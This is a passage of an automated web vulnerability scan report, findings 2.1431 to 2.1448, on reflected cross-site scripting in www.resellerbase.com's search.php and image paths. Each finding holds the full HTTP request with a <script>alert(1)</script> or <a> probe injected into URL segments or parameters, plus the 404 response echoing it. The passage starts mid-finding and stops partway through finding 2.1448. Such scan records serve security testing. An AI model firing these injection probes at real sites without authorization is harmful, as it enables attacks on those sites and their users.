GET /detail/17/themes/kosmos/images/ratingee222<script>alert(1)</script>cddb10b6b20/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/ratingee222<script>alert(1)</script>cddb10b6b20/3half.gif was not found on this server.</p>
...[SNIP]...

2.1431. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5229d<script>alert(1)</script>1e2b27f7c97 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/3half.gif5229d<script>alert(1)</script>1e2b27f7c97 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/3half.gif5229d<script>alert(1)</script>1e2b27f7c97 was not found on this server.</p>
...[SNIP]...

2.1432. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 336f4<script>alert(1)</script>51e04780ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/3half.gif?336f4<script>alert(1)</script>51e04780ef3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/3half.gif?336f4<script>alert(1)</script>51e04780ef3=1 was not found on this server.</p>
...[SNIP]...

2.1433. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3987<script>alert(1)</script>8b66fb92144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb3987<script>alert(1)</script>8b66fb92144/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3987<script>alert(1)</script>8b66fb92144/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1434. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4df78<script>alert(1)</script>5ee33762d84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/174df78<script>alert(1)</script>5ee33762d84/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/174df78<script>alert(1)</script>5ee33762d84/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1435. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1683<script>alert(1)</script>089f8704369 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesd1683<script>alert(1)</script>089f8704369/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesd1683<script>alert(1)</script>089f8704369/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1436. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b727c<script>alert(1)</script>a949668be25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmosb727c<script>alert(1)</script>a949668be25/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmosb727c<script>alert(1)</script>a949668be25/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1437. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5ac9<script>alert(1)</script>60b66a13951 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/imagese5ac9<script>alert(1)</script>60b66a13951/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/imagese5ac9<script>alert(1)</script>60b66a13951/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1438. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d0f28<script>alert(1)</script>76cdcade775 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/ratingd0f28<script>alert(1)</script>76cdcade775/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/ratingd0f28<script>alert(1)</script>76cdcade775/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1439. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 52c67<script>alert(1)</script>9cbb1913c7c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/search.php52c67<script>alert(1)</script>9cbb1913c7c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php52c67<script>alert(1)</script>9cbb1913c7c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1440. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload de533<a>b3461a350b2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchde533<a>b3461a350b2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchde533<a>b3461a350b2&opt=2 was not found on this server.</p>
...[SNIP]...

2.1441. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4e3f<a>0cfed7915a5 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...c4e3f<a>0cfed7915a5&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...c4e3f<a>0cfed7915a5&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1442. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d00b0<script>alert(1)</script>ec1a1765a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d00b0<script>alert(1)</script>ec1a1765a6e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d00b0<script>alert(1)</script>ec1a1765a6e=1 was not found on this server.</p>
...[SNIP]...

2.1443. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d6e0b<a>be8bad20508 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6e0b<a>be8bad20508 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6e0b<a>be8bad20508 was not found on this server.</p>
...[SNIP]...

2.1444. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fdcf<script>alert(1)</script>1a8ef12489e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8fdcf<script>alert(1)</script>1a8ef12489e/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8fdcf<script>alert(1)</script>1a8ef12489e/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1445. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90f23<script>alert(1)</script>9e351caa8ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1790f23<script>alert(1)</script>9e351caa8ae/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1790f23<script>alert(1)</script>9e351caa8ae/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1446. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83470<script>alert(1)</script>c8f6b200cd1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes83470<script>alert(1)</script>c8f6b200cd1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes83470<script>alert(1)</script>c8f6b200cd1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1447. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3770a<script>alert(1)</script>c28160dba38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos3770a<script>alert(1)</script>c28160dba38/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos3770a<script>alert(1)</script>c28160dba38/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1448. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

